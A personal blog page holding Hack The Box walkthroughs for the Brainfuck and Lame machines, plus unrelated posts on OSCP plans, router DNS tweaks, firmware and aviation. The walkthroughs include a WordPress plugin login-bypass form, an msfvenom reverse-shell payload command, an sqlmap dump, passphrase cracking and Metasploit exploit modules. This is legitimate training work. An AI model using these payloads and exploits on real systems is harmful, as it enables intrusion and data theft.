Brainfuck – Hack The Box

by

Machine: https://app.hackthebox.com/machines/Brainfuck

Alright, I have to mention this one has intimidated me. It has a level of “insane.”

Let’s start. A simple portscan reveals the following open ports:

$ nmap 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 06:38 EST
Nmap scan report for 10.10.10.17
Host is up (0.023s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https

The SSL cert points to brainfuck.htb, so we better add that to the /etc/hosts file:

10.10.10.17 brainfuck.htb

It seems that it runs a WordPress installation, with a cryptic message: “SMTP Integration is ready. Please check and send feedback to [email protected]”. Some really guess:

  1. Gain access and upload a web shell?
  2. Do something with port 25 as user orestis?

At least we know that the admin user is called “admin”. Otherwise, our very helpful login page tells us that the user doesn’t exist:

Using wpscan we find the following helpful information:

$ wpscan --disable-tls-checks --url "https://brainfuck.htb/"
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
[+] WordPress readme found: https://brainfuck.htb/readme.html
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
[+] WordPress theme in use: proficient
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[+] wp-support-plus-responsive-ticket-system version 7.1.3

Nice, a smörgåsboard of possibilities. The plugin “Support Plus Responsive Ticket System 7.1.3” has two public exploits:

  1. Privilege Escalation: https://www.exploit-db.com/exploits/41006
  2. SQL Injection: https://www.exploit-db.com/exploits/40939

Let’s try to authenticate as admin using the following HTML code:

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="admin">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Oui oui, je suis admin!

Now let’s create a nice Meterpreter reverse_tcp PHP payload:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f raw -o shelly.php

And paste it in the bottom of footer.php at https://brainfuck.htb/wp-admin/theme-editor.php?file=footer.php&theme=proficient

Oh wait, there is no save button. Oh wait, the file is not writable! Argh… You see, guys, I’m not making this up. This is me trying to solve the CTF in real-time.

Let’s try the SQL injection vulnerability. Maybe helpful something is hidden in the depths of MySQL.

According to the exploit, the POST parameter “cat_id” in the wp/admin/admin-ajax.php path is vulnerable. This sqlmap command dumps the database:

sqlmap --dbms=mysql -u "https://brainfuck.htb/wp-admin/admin-ajax.php" --method POST --data "action=wpsp_getCatName&cat_id=0" -p cat_id --cookie='PASTE_HERE_COOKIES_FROM_AN_AUTHENTICATED_SESSION' --level 3 --risk 3 --dump

This will take some time, get some coffee and watch a couple of Mr. Robot episodes on Netflix. There are probably more efficient ways of extracting the database, but I feel lazy right now.

Oh wait (again), while lazy-browsing around I found this page, containing the following SMTP credentials at https://brainfuck.htb/wp-admin/options-general.php?page=swpsmtp_settings

SMTP username: orestis
SMTP password: kHGuERB29DNiNE

Using these credentials, we can authenticate towards the POP3 server (likely also the IMAP) using Thunderbird and fetch the emails for user orestis. There is an interesting message from root:

Hi there, your credentials for our "secret" forum are below 😄

username: orestis
password: kIEnnfEKJ#9UmdO

Regards

Looking at the SSL certificate for brainfuck.htb we can find the “secret” forum:

$ echo "" | openssl s_client -connect brainfuck.htb:443 > cert.key; openssl x509 -in cert.key -text -noout | grep DNS
...
DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb

Which we add to /etc/hosts and visit the URL https://sup3rs3cr3t.brainfuck.htb/

After we authenticate using the aforementioned credentials, we see the following interesting conversation in the forum at https://sup3rs3cr3t.brainfuck.htb/d/3-key

This looks like a cipher. If we look at orestis’ profile, we can see he always signs his messages with the following:

Orestis - Hacking for fun and profit
Pieagnm - Jkoijeg nbw zwx mle grwsnn
Wejmvse - Fbtkqal zqb rso rnl cwihsf
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

We can safely assume that these strings mean the same thing. Knowing a common factor across several messages is partially how Rejewski cracked the Enigma cipher. Do we have something similar here?

We can also safely assume that this is the link to the SSH key, and thus something like:

https://brainfuck.htb/...
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

Now let’s try to solve this. If we calculate the distances and arrange them like so, we can see a kind of pattern:

If we try to fill in the blanks, and “re-arrange” the parts of the sequence that repeat, we get something like this:

After many hours of sweat and tears (aka decoding a small piece, using it to get new offsets, decoding another small piece, etc…), I finally managed to decode the messages by writing a small PHP script (why PHP? I hate snakes):

<?php
$key = [21,6,24,16,14,2,25,9,0,18,13]; # Same as above but modulo 26.

$texts = [];
$texts []= "Mya qutf de buj otv rms dy srd vkdof :) Pieagnm - Jkoijeg nbw zwx mle grwsnn";
$texts []= "Xua zxcbje iai c leer nzgpg ii uy...";
$texts []= "Ufgoqcbje.... Wejmvse - Fbtkqal zqb rso rnl cwihsf";
$texts []= "Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :) mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja";
$texts []= "Si rbazmvm, Q'yq vtefc gfrkr nn ;) Qbqquzs - Pnhekxs dpi fca fhf zdmgzt";

foreach ($texts as $text) {
    $di = 0;
    for ($i = 0; $i < strlen($text); $i++) {
        
        if (ctype_alpha($text[$i])) {
            $c = ord($text[$i]);
            $shift = $key[$di++ % count($key)];
            $cn = $c + $shift;

            if ($c >= ord("a") && $c <= ord("z")) {
                while ($cn < ord("a")) $cn += 26;
                while ($cn > ord("z")) $cn -= 26;
            } else if ($c >= ord("A") && $c <= ord("Z")) {
                while ($cn < ord("A")) $cn += 26;
                while ($cn > ord("Z")) $cn -= 26;
            }

            echo chr( $cn );

        } else {
            echo $text[$i];
        } 
    }
    echo "\n";
}
?>

It is sort-off a XOR cipher, but with modulo 26 addition instead of XOR and offset by the ASCII value for “a” or “A.”

PS from the next day: Apparently, this is the “Vigenère cipher,” and the password is “FUCKMYBRAIN.” Look at this beauty:

$ php -r 'foreach (str_split("FUCKMYBRAIN") as $c) echo (1+ord("Z")-ord($c)).",";';
21,6,24,16,14,2,25,9,26,18,13, # Same as I came up with

I’m proud that I managed to solve it without any knowledge of what a Vigenère cipher is.

Running my script gives us the solution:

$ php decode.php 
Hey give me the url for my key bitch :) Orestis - Hacking for fun and profit
Say please and i just might do so...
Pleeeease.... Orestis - Hacking for fun and profit
There you go you stupid fuck, I hope you remember your key password because I dont :) https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
No problem, I'll brute force it ;) Orestis - Hacking for fun and profit

Don’t you love their chemistry? I certainly do.

Anyways, now we can download the private key and try login to the machine using SSH:

$ wget --no-check-certificate https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
$ chmod 600 id_rsa
$ ssh -l orestis -i id_rsa brainfuck.htb
Enter passphrase for key 'id_rsa':

Oh well, fuck. We have to brute force the private key password:

$ ssh2john id_rsa > id_rsa.john
$ john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
3poulakia! (id_rsa)

And the password has been found. By the way, it means “3 small birds” in Greek. Που κάθονταν τα τρια πουλάκια ρε μεγάλε Ορέστη;

May we finally log in to the machine?

$ ssh -l orestis -i id_rsa brainfuck.htb      
Enter passphrase for key 'id_rsa': (3poulakia!)
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Mon Oct  3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

YES! And the user flag is:

$ cat user.txt
2c11*************************************

Now let’s get root.

Ehm, I got root very quickly. I don’t think this was the intended path (old machine/new exploits). Basically, I upgraded to a meterpreter shell, ran the post/multi/recon/local_exploit_suggester module, and then ran the exploit/linux/local/bpf_sign_extension_priv_esc module, which was one of the many exploits suggested. I instantly got root, and the flag was right there:

meterpreter > cat /root/root.txt
6efc********************************

But let’s try to get root the way we were intended to. If we look in orestis’ home dir, there is a script named encrypt.sage that encrypts the root flag and saves it in /home/orestis/output.txt. It looks like an RSA encryption implementation in SageMath. SageMath is a Python-based open-source scripting language for mathematicians. All the information, including the p, q and e keys used during encryption, are available in /home/orestis/debug.txt.

nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)

n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

Using the information available, I wrote another SageMath script that decrypts the root flag:

# The encrypted message
c = Integer(int(open("output.txt").read().split(" ")[2].strip()));

# Values that were used during encryption
p = Integer(int(open("debug.txt").read().split('\n')[0].strip()));
q = Integer(int(open("debug.txt").read().split('\n')[1].strip()));
e = Integer(int(open("debug.txt").read().split('\n')[2].strip()));
phi = (p-1)*(q-1)
n = p*q

# In RSA, the decryption key d is the multiplicative inverse of e.
# We compute is as such:
d = pow(e, -1, phi)

# And thus the remainder of e*d dividing phi must be equal to 1:
print "This must be equal to 1: " + str((e*d) % phi)

# Now that we have the decryption key d we decrypt message c as such:
m = pow(c, d, n)

print "Root flag: " + ('%x' % int(m)).decode('hex')

And tada, we get the same key once again:

$ sage decrypt.sage
This must be equal to 1: 1
Root flag: 6efc********************************

What did we learn from this box? Two things for me:

  1. Even “insane” machines have a solution given enough time.
  2. Older machines are most certainly easier to root using new exploits and vulnerabilities, but maybe I should stick to the intended path if I want to learn something.

Lame – Hack The Box

by

Machine: https://app.hackthebox.com/machines/Lame

Since this is the first machine for this journey, let’s that by downloading the OpenVPN configuration from HTB and creating a quick alias to connect (I will be using Kali Linux by the way, not the integrated Pwnbox):

$ echo "alias htb='sudo openvpn /home/kali/VPNs/htb.ovpn'" >> ~/.zshrc (or ~/.bashrc)

Logout / Login and then:

$ htb

Let’s start with a plain nmap:

$ nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 04:22 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
$ ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=22.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=22.6 ms
...

Which is immediately lying that the machine doesn’t respond to ping. You need to add the -Pn flag to scan a machine that doesn’t “respond to ping”:

$ nmap 10.10.10.3 -Pn
...
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

It seems the machine has SMB shares, let’s enumerate them:

$ smbclient -L 10.10.10.3
Password for [WORKGROUP\kali]: (empty)
Anonymous login successful

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server                   Comment
---------                   -------
Workgroup            Master
---------                   -------
WORKGROUP     LAME

“oh noes!”? lol. Lame, I guess? Let’s see what we find in tmp:

$ smbclient \\10.10.10.3\tmp 130 ⨯
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Sun Jan 8 04:31:20 2023
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sun Jan 8 04:20:46 2023
vmware-root DR 0 Sun Jan 8 04:21:13 2023
.X11-unix DH 0 Sun Jan 8 04:21:12 2023
.X0-lock HR 11 Sun Jan 8 04:21:12 2023
vgauthsvclog.txt.0 R 1600 Sun Jan 8 04:20:44 2023
5574.jsvc_up R 0 Sun Jan 8 04:21:50 2023

7282168 blocks of size 1024. 5386552 blocks available

Of these files, only vgauthsvclog.txt.0 and .X0-lock are downloadable, and they contain no valuable information. None of the other shares seems to be useful either. Maybe we need to find some credentials first.

The other open services did not accept connections without credentials either. However, I noticed generally outdated software running. Let’s do a deeper scan and see if there is a vulnerability we can find:

$ sudo nmap -Pn -script vuln,default -p21,22,139,445 -sV -O 10.10.10.3

It turns out Samba 3.0.20-Debian is vulnerable to CVE-2007-2447. Use the Metasploit framework and apply the multi/samba/usermap_script module:

whoami
root
cat /root/root.txt
c3a***************************************
cat /home/makis/user.txt
e14***************************************

There are a few more interesting paths on this machine. My guess is there is more than one way to the flags, but I will leave this up to you to explore!

So what did we learn from this machine? Sometimes a host is so open you don’t know where to start =).

PS: Γεια σου Μάκη!

Path to OSCP/PEN-200

by

Over the next few months (years?) I will document my attempt to obtain the OSCP certification on this blog. By doing my own research online, I have concluded that probably the following path is the most optimal:

  1. Complete the Offensive Pentesting TryHackMe learning path – Done.
  2. Complete TJ_Null’s list of Hack The Box OSCP-like machines.
  3. Enroll in the OSCP/PEN-200 course and complete your certification.

As evident by the list above, I have completed the first step:

So the next step is to complete TJ_Null’s list.

I’m aware that many other security professionals have done similarly in the past, and this is my way of learning while returning to this site and reviewing my notes. As a bonus, you can use my notes in your journey should you decide to take the OSCP certification.

By the way, here is my Hack The Box profile, and yes, sadly, you will need a VIP subscription to be able to access retired machines. I purchased the annual subscription and canceled it immediately so that it doesn’t surprise me by renewing automatically in a year.

Want to follow my journey in real time? Subscribe to this site’s RSS feed (yes, this still is a thing).

ForeFlight Sentry Firmware

by

WARNING: Do not use these firmware files on anything unless you know what you are doing. You WILL void your warranty when using firmware from unofficial sources.

Ah, ForeFlight (uAvionix cough cough) sure knows how to restrict your freedom when it comes to upgrading or downgrading your Sentry firmware.

But fear not, for Uncle Dimme is here to save the day!

By the way, I strongly advise against using any of these files for any purpose. I cannot accept any responsibility whatsoever… Seriously, I won’t take any blame.

Oh, and if you’re not a fan of the filenames, remember to direct your frustrations towards Alonzo!

Sentry_V0.2.39.binDownload
wifiSentryRevD_V0.2.37.binDownload
wifiSentryRevD_V0.2.29.2.binDownload
wifiSentryMini_V0.2.37.binDownload
wifiSentryMini_V0.2.29.2.binDownload

Telia Sagemcom and 1.1.1.1

by

If you are unfortunate enough to have been given a Telia WiFi router model F@st 5370e made by Sagemcom, you may have experienced that IP 1.1.1.1 is unreachable. [1, 2, 3]

1.1.1.1 is a public DNS server provided by Cloudflare that many of us prefer to use, instead of, let’s say, Telia’s own snooping DNSes or Google’s 8.8.8.8. Of course, an alternative is to use 1.0.0.1, which also provides the same service by Cloudflare, but where is your backup DNS in that case?

The reason it is unreachable is that the router is using this IP internally for an interface called “IP_BR_LAN_LXC“. LXC is a userspace interface that can be used to create and manage application containers.

You can disable the “IP_BR_LAN_LXC” interface by following the instructions given below:

  1. Login to you router’s “admin” (sic) interface by browsing to http://192.168.1.1
  2. If you’re using Firefox or Chrome, press “F12” and navigate to the “Console” tab.
  3. Enter the following command and press Enter: $.xmo.setValuesTree(false,"Device/IP/Interfaces/Interface[Alias='IP_BR_LAN']/IPv4Addresses/IPv4Address[Alias='IP_BR_LAN_LXC']/Enable");

That’s it, 1.1.1.1 should now be reachable. I have not experienced any issues by disabling this interface. Maybe I’ve blocked Telia from using some remote tools to mess with my router? I call this a win in that case. If for some reason, you want to reverse the setting above and re-enable this interface, you can do so by typing the following command into the console:

$.xmo.setValuesTree(true,"Device/IP/Interfaces/Interface[Alias='IP_BR_LAN']/IPv4Addresses/IPv4Address[Alias='IP_BR_LAN_LXC']/Enable");

Bonus: While you’re at it, block 8.8.8.8 and 8.8.4.4 from your network. Reason? Android, and in general Google devices, are using this DNS regardless of your DHCP settings. You can block them by going to this hidden path in your router and adding 8.8.8.8 and 8.8.4.4:

http://192.168.1.1/0.1/gui/#/access-control/parental-control/filtering

PS: You can either change the DNS servers on a per-device basis, or you can change the DNS servers that your DHCP server is announcing to your local network. This can be done using the following hidden URL:

http://192.168.1.1/0.1/gui/#/mybox/dns/server

DISCLAIMER: I don’t take any responsibility for any of your actions blah blah blah…

Mollymawk tests

by

Yes, I am alive. I know I haven’t posted anything in three years. There are many reasons behind this, but I will leave this for another time.

As I mentioned in an earlier post, I got into this aviation thing back in 2015. Since then, I have taken it further and completed a commercial pilot’s license with multiple engine and instrument ratings and some other stuff. What does this all mean? I can now fly the big birds for money if an operator decides to hire me. But to the big question, how do you get an operator to hire you?

It is not a simple task; you have to submit countless applications and be prepared never to hear back from anyone. They say there is a pilot shortage, hmm…? If you are lucky, you might be called to an assessment. What? You don’t know what an assessment is? Don’t worry. I got you covered.

In the aviation industry, assessments are what job interviews are in any other field of work. But since pilots are rich (we are rich, right? somebody, please confirm?), assessments have to be complicated money and time-consuming processes. I was partially lucky and got called to an assessment for an operator called SunExpress. Spoiler alert: I didn’t get the job. I have nothing but good things to say about SunExpress. They are very professional in what they are doing and have high standards for their pilots. The reason I failed in my assessment is purely my own fault.

It basically works like this: You get a phone call, which is some kind of unofficial first interview. If they are happy with you after the phone call, you get invited to do an online ITEP English proficiency test. If you pass the ITEP test, you get invited to do some psychometric tests at SunExpress’s own premises. If you pass the psychometric tests, you get invited to do a simulator test-flight in a full-motion Boeing 737-800 simulator. The simulator was a lot of fun to fly, but this is as far as I got. If you pass the simulator test, you get invited to a formal interview, and if you pass the interview, you get the job! Phew…

Boeing 737-800 Simulator
Boeing 737-800 Full Motion Simulator

So what are the psychometric tests? They are the Mollymawk psychometric tests, also used by other operators like CargoLux and Pegasus Airlines. They are split into two categories: skill tests and aptitude tests. The skill tests test your knowledge in math, science, and English. Those were the easy ones for me. The aptitude tests test your memory, orientation skills, and ability to multitask, divided into three computer “games” named “Working Memory” “Spatial Orientation” and “Time Sharing”.

To do the Mollymawk tests, you have to purchase two packages: skill and aptitude tests. Each package costs 150€, and if you fail one subject or game in one package, you have to re-purchase the whole package to do the failed test again. The first time I did the Mollymawk tests, I passed the skill tests but failed the aptitude tests. Thus I had to re-purchase the aptitudes package to do the tests a second time. Luckily the second time, I passed. You only get one second chance. In total, I spent 450€, not counting travel expenses, as a part of what essentially is a job interview for a job that I didn’t get.

I felt that more practice would give me a better chance to pass the aptitude tests on the first go. The aptitude tests are essentially a form of primitive computer games. When you purchase the aptitudes package, they give you 10 practice runs in each game you can play at home. They argue that the learning curve is logarithmic and that after 10 practice runs, you have asymptotically reached your optimum ability in playing the games, but I doubt that. As anyone knows, practice makes perfect. So I decided to code my own version of the games and help other pilots truly reach the optimum before doing the final tests.

I have created a Mollymawk test practice website, where I have implemented my own version of the Mollymawk games. A user can register an account and purchase one of the three time-limited packages for playing the games. The games may be played unlimited times!

I have also implemented an interface for the users to track their progress as they are getting better:

Why do I ask for money and not put it out for free if I truly care about the other pilots? Somehow, I have to make back the money I lost during my earlier “job interviews”. After-all, pilots are rich. We rich guys, right? Do we have no problems paying 19€ instead of 150€ for doing the tests a second time?

Anyhow, if you are a pilot and in need of my services, I truly hope I helped and wish you the best of luck!

And remember, when in doubt, go around! (preferably above 1000 feet GND in IMC, unlike me).

The BlackWing

by

BlackWing is a Swedish light sport aircraft manufacturer. They are based in Eslöv, Sweden, and currently have a couple of models available for purchase. One is registered as an Ultralight and the other one as Experimental. When the paperwork is ready, they will also offer the BlackWing as a CS-LSA.

The development of the BlackWing has been focused on creating a very efficient aircraft with great flying characteristics and high safety standards while still using modern cutting-edge technology. And did I mention that the whole thing is made in pre-preg carbon fiber?

Visit their website for more information and watch my video review below.

http://www.blackwing.aero/

Flying airplanes and living life

by

So I haven’t written anything on this website for quite some time. Nothing much has happened since my last post, besides one little thing. I took my private pilot’s license (PPL), which I am very proud of. I am certified to fly small single-engine piston (SEP) airplanes up to 5700 kg and land them on land, not water. This happened at the end of June 2015, so it has actually been a while. Since then, I have logged a little more than 70 hours of flight time, mainly on Cessnas 172 and 152. In September 2015, I started working on my night rating (NQ) to fly during the night. I still have one hour of flight left before I get this rating, but the school, some school in south Sweden (ha!) that I went to, had their teaching permission revoked due to some administrative hurdles. Hopefully, they will get it back sometime in March, and I will finish my rating.

One more thing that I have been doing is studying ATPL theory at TFHS, the aviation school of Lund University (I can’t seem to detach myself from this university). I’m still at the stage where I’m doing my school exams before moving on to the EASA exams. I should complete those sometime in early summer (ha-ha summer in Sweden), and then I should attempt the EASA exams. A really nice tool for helping me in my ATPL studies is the aviation exam. They are not paying me anything for writing about them here, I really find them useful, and I want to share my experience with other students.

So long people, be happy and enjoy life!

Oh, and by the way, here is a video of the first flight of the year in snowy Sweden:

First solo and first cross-country solo flight

by

My 30th hour in the air is approaching. The required hours for a PPL license are 45. I really like flying. It’s something that grows on you. So far, I have performed a few hours of solo flight, which means that you are alone in the cockpit flying the airplane. The cross-country solo flight is a longer version of a longer flight to navigate to a nearby airport. Enjoy the videos!